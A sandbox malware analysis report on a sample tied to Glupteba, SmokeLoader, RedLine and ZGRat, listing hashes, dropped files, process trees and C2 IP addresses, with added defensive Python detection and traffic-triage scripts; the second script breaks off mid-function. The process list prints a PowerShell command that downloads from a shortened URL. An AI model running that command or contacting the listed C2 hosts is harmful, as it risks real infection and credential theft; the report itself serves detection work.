Analysis Overview
SHA256
2b3edccf5deb78e43bf9267a60f85b096b25f15cf6bd1c83c56404d7fe0e7dda
Threat Level: Known bad
The file 0x00310000000142c9-42.dat was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
SmokeLoader
RedLine payload
ZGRat
Detect ZGRat V1
Smokeloader family
Glupteba
RedLine
Downloads MZ/PE file
Reads user/profile data of web browsers
Loads dropped DLL
Deletes itself
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Unsigned PE
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 22:25
Signatures
Smokeloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 22:25
Reported
2023-12-18 22:27
Platform
win7-20231215-en
Max time kernel
34s
Max time network
41s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9E23.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C0A2.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1260 wrote to memory of 2796 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9E23.exe |
| PID 1260 wrote to memory of 2796 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9E23.exe |
| PID 1260 wrote to memory of 2796 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9E23.exe |
| PID 1260 wrote to memory of 2796 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9E23.exe |
| PID 1260 wrote to memory of 1680 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C0A2.exe |
| PID 1260 wrote to memory of 1680 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C0A2.exe |
| PID 1260 wrote to memory of 1680 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C0A2.exe |
| PID 1260 wrote to memory of 1680 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C0A2.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe
"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"
C:\Users\Admin\AppData\Local\Temp\9E23.exe
C:\Users\Admin\AppData\Local\Temp\9E23.exe
C:\Users\Admin\AppData\Local\Temp\C0A2.exe
C:\Users\Admin\AppData\Local\Temp\C0A2.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| RU | 77.105.132.87:17066 | N/A | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
Files
memory/1220-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1220-2-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1260-1-0x0000000002990000-0x00000000029A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9E23.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/2796-14-0x0000000000170000-0x00000000001C2000-memory.dmp
memory/2796-19-0x0000000074EB0000-0x000000007559E000-memory.dmp
memory/2796-20-0x0000000004FF0000-0x0000000005030000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C0A2.exe
| MD5 | 8426cb86fd074a9fa24c7a03fb6ba83e |
| SHA1 | 0703f24aee9b972ee7f013d68e0bc6adf6815f2f |
| SHA256 | 4c31482f75d5235702a7e5524dc37650cf1501d76c362897cc381ecd4dd18f8b |
| SHA512 | 9aa69dc7d85cffcfed21447c327525cce8431e0a261cf72c0e54794725ebc2b9d8092d04d41ba38e8e8e99303a9e4ec8370d9921bea429b4567af41394ab5b67 |
C:\Users\Admin\AppData\Local\Temp\C0A2.exe
| MD5 | 8420b69596c39acf6dbb223d54cd0c63 |
| SHA1 | ff085bc696ecb71f0dd6a145789be36238c09079 |
| SHA256 | 5a1378f18b3ffb4d5bcb9c01920d76381edc7b8a73581129f9f0e7c19e4267ce |
| SHA512 | fcc88ddfe7baefb0a58fcb7fa34ea07340491f9b0a051e1ca9670130e9ec291879cc44a28562033bb8f24ac8f53aee8ce0c5bb42011002776da42110972ae9ca |
memory/1680-27-0x0000000074EB0000-0x000000007559E000-memory.dmp
memory/1680-28-0x0000000000D20000-0x0000000001B12000-memory.dmp
\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 0b4f47c84fea3289d10a7c8ee44e9a05 |
| SHA1 | 1dcee1baf50d19875fac2fe10c9be03cc56d14a3 |
| SHA256 | 46c923f681342628b916cd91c459a1ffb5ea616bc0d3a1cd534a25ef60058f1b |
| SHA512 | 93a587c9ed64d100085e70b4fffb4e853e87a7904b4a3b4e5a20b2f3dd8589db7efda3de70dead2eb88c45f115d4c6746d58acfaa8f4bbf6d24a9a0decea313c |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 93fd9db8463f1399af604b73f5b91f98 |
| SHA1 | fa74506d738165d8b393eddd9d4946658a0ce9d0 |
| SHA256 | 2db9f15147bc3d2c0eedfef29143bfb09a9252dade8f35ebc77ab4943a1b7b28 |
| SHA512 | 0a93a75cd22dc723764f6eb9a163311c2ff7b395e50ab2ceb4c60e07b04105456d754e5bcebc5650489691ea1d12e6057a493d307988b4b211ec5f536de0b3af |
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | da02cbbe2494696eab1d22b727df2568 |
| SHA1 | 000cf27825245f6808d338fa9166b79079802641 |
| SHA256 | 6037979e0cdf0b3f983483e00d964ee1a1d17075da3e313610254269ac186cbf |
| SHA512 | f687527f44303e01b6da681b8919e6dbd19dfcfdd2927314f0851952dbc7d21f4bdf4fbea69e0f88d8c84c06b87c55b1612588166c59319562ab80ed819a850b |
\Users\Admin\AppData\Local\Temp\nsoCACF.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
memory/2668-58-0x0000000002560000-0x0000000002958000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 628ed1cb74d466586abe2c07dd9054ca |
| SHA1 | f579b31bb48ef7b1f900d3e024808af152212569 |
| SHA256 | e5cef7f1f342e2cd37533d13a33116f19b646b1264ac0f1bcf8ebf7d3383ee27 |
| SHA512 | fd95edafc0f78724dd3b1312adef01c59a487df238f431351e8acaff0d8ca4af8563ecee1aec7487d67ec77bf138e90d8878170e8453e268fd50032f81939dd6 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | bba2971c6aa2f5185c334e0600ddbb8f |
| SHA1 | 154dbd64a6fc433bfb28d8fa4cbd7d7e295f9a5e |
| SHA256 | ef63f4971cda8b49df48e66af3c374fd2878f81ad5b2f4f24d0c85b0e294bd0e |
| SHA512 | a465675bac51bc6848093017dc439991ad7d7280787770a5d7cabe96f3a216fb85c53bc9ffb87733cd2cff11f059da4e339aea97b5c3953b1c6a0cab2eb9122d |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 9be9673496e2c450154568b60d2e5db4 |
| SHA1 | 453eddc50ed7d3c7dbad8d7f88c3cb0f977d41a2 |
| SHA256 | ea0cdeb898250d7ce38bfe22e88dc247f428726ce870fd6ad37cd313cdde3e54 |
| SHA512 | a7a8176633b2ab837cae379bac6e7b5481fb24554b989d2c06503babaa896f65acb18500dd93408e6d08d95e215ca790c4dfba19c8a09eb36ce8c01b97d3da8a |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 81df7fc6a5f25fdb9cd4e20359e4375d |
| SHA1 | 8adbd2cd7b0d8ba270ffb02ff4161887e19d9689 |
| SHA256 | b1f679a0eb94145ce8e752a5a39123e1cdc01528ecd11d2eecdf7efd7d704c41 |
| SHA512 | 76c5a264203e898b84152d0ea4334e95cf576661ed98d92d6293d919a76e73ca0b7dc6f7bafc3081c23f3d585b205cbb1aaa7d7b2f3f293801c9183e90155eb9 |
\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 52c0b1e179b7a02c3994a1906f9dcb2c |
| SHA1 | 7cb6945491fe0dc3d9a0733fd2fb460fd5829caa |
| SHA256 | 5ad4bbace04417d727f5ad9e391f6448d1a48a10b8d9a8c203ad09bc5197e610 |
| SHA512 | 4b1b53baf326e91cb5e7ec290b0ba81681c9f7a3106c34e571c93997a82dd8e68b9cacfbc2ff9493b4bcbc025a45613f35a756cc3cb6622dff288972d3b4afa4 |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 9193ff317000ba1603345d92a1a8fbbd |
| SHA1 | 3e8c626c9439054b4e0c637a22605d10d497abb4 |
| SHA256 | aa0bce4669b5390242740bc7fcbb8e9c53a7f3e6c158bb0e4fa2dbb8049d35f2 |
| SHA512 | fbb673e035e888ff1170b767e7f031feb4cf66634af10ec8f65c499c48ca3087dc3996eeda68920fa94458b8d3d3e1562128b37f1fa1d6c70bf5acd228ff5bc5 |
memory/1876-69-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 4bebcc80c4f2920e5e7252492b38c140 |
| SHA1 | 4bcae052db639d6996b886d732965acc82f878d7 |
| SHA256 | 38610902e0ba8bddeca6b0be96c1cb10659fbafd3079ff6863194c17ca1b2a15 |
| SHA512 | 89e2cf8118169b342485c241447e87492c015f14f2a596c648d77e36a96f517bb91172acf4d63a5925d4e455d5b1cd81382a9f3e036c234d5b2dfb423d59638f |
memory/1680-72-0x0000000074EB0000-0x000000007559E000-memory.dmp
\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 0a90f231fcfede6e071cfa5e88b244f7 |
| SHA1 | 161954936f6bef19c895d6798a9ebc1e36eb8d5f |
| SHA256 | 79ea00cd8c63517f97df7948f4ecd1ee2a9b675d3e5af787ee27fab78abe576e |
| SHA512 | 0f9ce57279ce81200514c843038b640c4a2138badf12a57651360a906dab9f3ee4c6e3b4473a2eebc4e819db587ef217fd49d5871d1607f8609e8b1942d7c171 |
\Users\Admin\AppData\Local\Temp\nsoCACF.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 22:25
Reported
2023-12-18 22:27
Platform
win10v2004-20231215-en
Max time kernel
56s
Max time network
117s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F7ED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\933.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\933.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1608 set thread context of 1356 | N/A | C:\Users\Admin\AppData\Local\Temp\933.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\F7ED.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe
"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"
C:\Users\Admin\AppData\Local\Temp\F7ED.exe
C:\Users\Admin\AppData\Local\Temp\F7ED.exe
C:\Users\Admin\AppData\Local\Temp\933.exe
C:\Users\Admin\AppData\Local\Temp\933.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Users\Admin\AppData\Local\Temp\4071.exe
C:\Users\Admin\AppData\Local\Temp\4071.exe
C:\Users\Admin\AppData\Local\Temp\4CB7.exe
C:\Users\Admin\AppData\Local\Temp\4CB7.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\is-E9HMQ.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E9HMQ.tmp\tuc3.tmp" /SL5="$200022,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\7474.exe
C:\Users\Admin\AppData\Local\Temp\7474.exe
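The process list above is the useful part of this run for detection engineering: short hex-named executables launched from %LOCALAPPDATA%\Temp (F7ED.exe, 933.exe, 4071.exe, 4CB7.exe, 7474.exe), 933.exe (PID 1608) setting the thread context of RegSvcs.exe (PID 1356), cmd.exe running install.bat, and PowerShell fetching a bit.ly URL. The script below is an added example and is not part of this report or of any sandbox vendor's tooling. It turns those four observations into process-creation rules and runs them over constructed events modelled on this process tree; apart from the 1608/1356 pair, which the SetThreadContext row gives, every PID, every parent PID and the two Contoso control entries are assumed for illustration.

```python
import re

# Constructed process-creation events modelled on the behavioral2 process list in
# this report. PIDs 1608 and 1356 come from the report's SetThreadContext row; all
# other PIDs, all parent PIDs and the two Contoso entries are assumed for the example.
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
DOTNET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
EVENTS = [
    {"pid": 4572, "ppid": 1000, "image": TEMP + r"\0x00310000000142c9-42.exe",
     "cmdline": '"' + TEMP + r"\0x00310000000142c9-42.exe" + '"'},
    {"pid": 1832, "ppid": 4572, "image": TEMP + r"\F7ED.exe", "cmdline": TEMP + r"\F7ED.exe"},
    {"pid": 1608, "ppid": 4572, "image": TEMP + r"\933.exe", "cmdline": TEMP + r"\933.exe"},
    {"pid": 1356, "ppid": 1608, "image": DOTNET, "cmdline": DOTNET},
    {"pid": 1504, "ppid": 4572, "image": TEMP + r"\4071.exe", "cmdline": TEMP + r"\4071.exe"},
    {"pid": 4372, "ppid": 1504, "image": TEMP + r"\InstallSetup9.exe",
     "cmdline": '"' + TEMP + r"\InstallSetup9.exe" + '"'},
    {"pid": 2200, "ppid": 4372, "image": r"C:\Windows\SYSTEM32\cmd.exe",
     "cmdline": "cmd.exe /c install.bat"},
    {"pid": 1032, "ppid": 1872,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -Command \"Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'\""},
    # Benign controls (constructed): RegSvcs.exe started from a Program Files parent
    # must NOT trip rule 2; only the Temp-resident parent does.
    {"pid": 6000, "ppid": 800, "image": r"C:\Program Files\Contoso\Updater.exe",
     "cmdline": r"C:\Program Files\Contoso\Updater.exe /quiet"},
    {"pid": 6001, "ppid": 6000, "image": DOTNET,
     "cmdline": r"RegSvcs.exe C:\Program Files\Contoso\Component.dll"},
]

TEMP_MARKER = "\\appdata\\local\\temp\\"
HEX_NAME_RE = re.compile(r"^[0-9a-f]{1,4}\.exe$")       # 9E23.exe, C0A2.exe, F7ED.exe, 933.exe ...
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe"}            # common hollowing targets for .NET loaders
SHORTENERS = ("bit.ly/", "tinyurl.com/", "t.co/", "is.gd/")


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def in_user_temp(path):
    return TEMP_MARKER in path.lower()


def _hit(rule, e):
    return {"rule": rule, "pid": e["pid"], "ppid": e["ppid"], "image": e["image"]}


def detect(events):
    """Apply the four rules derived from this report's process tree; return the hits."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_in_temp = parent is not None and in_user_temp(parent["image"])
        cmd = e.get("cmdline", "").lower()
        # Rule 1: 1-4 hex-digit executable name running from the user's Temp folder
        if in_user_temp(e["image"]) and HEX_NAME_RE.match(name):
            hits.append(_hit("temp_hex_named_exe", e))
        # Rule 2: .NET utility host whose parent lives in Temp (shape of the
        # "PID 1608 set thread context of 1356" row: hollowing RegSvcs.exe)
        if name in DOTNET_HOSTS and parent_in_temp:
            hits.append(_hit("dotnet_host_spawned_from_temp", e))
        # Rule 3: cmd.exe executing a batch file on behalf of a Temp-resident dropper
        if name == "cmd.exe" and ".bat" in cmd and parent_in_temp:
            hits.append(_hit("batch_launched_from_temp_dropper", e))
        # Rule 4: PowerShell web download through a URL shortener
        if name == "powershell.exe" and "invoke-webrequest" in cmd \
                and any(s in cmd for s in SHORTENERS):
            hits.append(_hit("powershell_download_via_shortener", e))
    return hits


def summary(events):
    counts = {}
    for h in detect(events):
        counts[h["rule"]] = counts.get(h["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    for h in detect(EVENTS):
        print(f"{h['rule']:34} pid={h['pid']:<5} ppid={h['ppid']:<5} {h['image']}")
```

Rule 2 deliberately keys on the parent's path rather than on RegSvcs.exe alone, which is why the Contoso control does not fire; RegSvcs.exe with a legitimate parent is routine on developer and server hosts.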
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.216.114.251:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.114.216.52.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| US | 8.8.8.8:53 | 125.65.42.5.in-addr.arpa | udp |
| RU | 77.105.132.87:17066 | N/A | tcp |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| N/A | 195.20.16.103:18305 | N/A | tcp |
| US | 8.8.8.8:53 | 103.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.237.62.212:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 212.62.237.104.in-addr.arpa | udp |
| BG | 91.92.254.7:80 | 91.92.254.7 | tcp |
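The Network tables of both runs mix three kinds of traffic that need different handling: resolver chatter to 8.8.8.8:53 (much of it reverse lookups the sandbox itself triggers), connections to legitimate services the malware abuses for hosting (bitbucket.org, github.com, objects.githubusercontent.com, bbuseruploads.s3.amazonaws.com) or for external-IP lookup (api.ipify.org), and raw IP:port connections with no domain at all, which are the blockable C2 candidates (185.215.113.68:80, 5.42.65.125:80, 77.105.132.87:17066, 195.20.16.103:18305, 91.92.254.7:80). The script below is an added example, not part of this report, that sorts the rows into those buckets; the sample rows are copied from the two tables above, including one row in the shifted form the extraction produced (protocol in the Domain column) and one deliberate repeat, and the hosting-provider zone list is an assumption you should tune to your own allow-list.

```python
RESOLVER = "8.8.8.8:53"
# Assumed zone lists for this example; extend to match your environment.
LEGIT_HOSTING = ("bitbucket.org", "github.com", "githubusercontent.com", "amazonaws.com")
IP_LOOKUP = ("api.ipify.org",)

# Constructed sample: rows copied from the two Network tables in this report.
SAMPLE_ROWS = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 52.216.114.251:443 | bbuseruploads.s3.amazonaws.com | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| N/A | 195.20.16.103:18305 | N/A | tcp |
| US | 104.237.62.212:80 | api.ipify.org | tcp |
| BG | 91.92.254.7:80 | 91.92.254.7 | tcp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
"""


def parse_rows(text):
    """Parse pipe-delimited Network rows; tolerate the shifted-column variant."""
    rows = []
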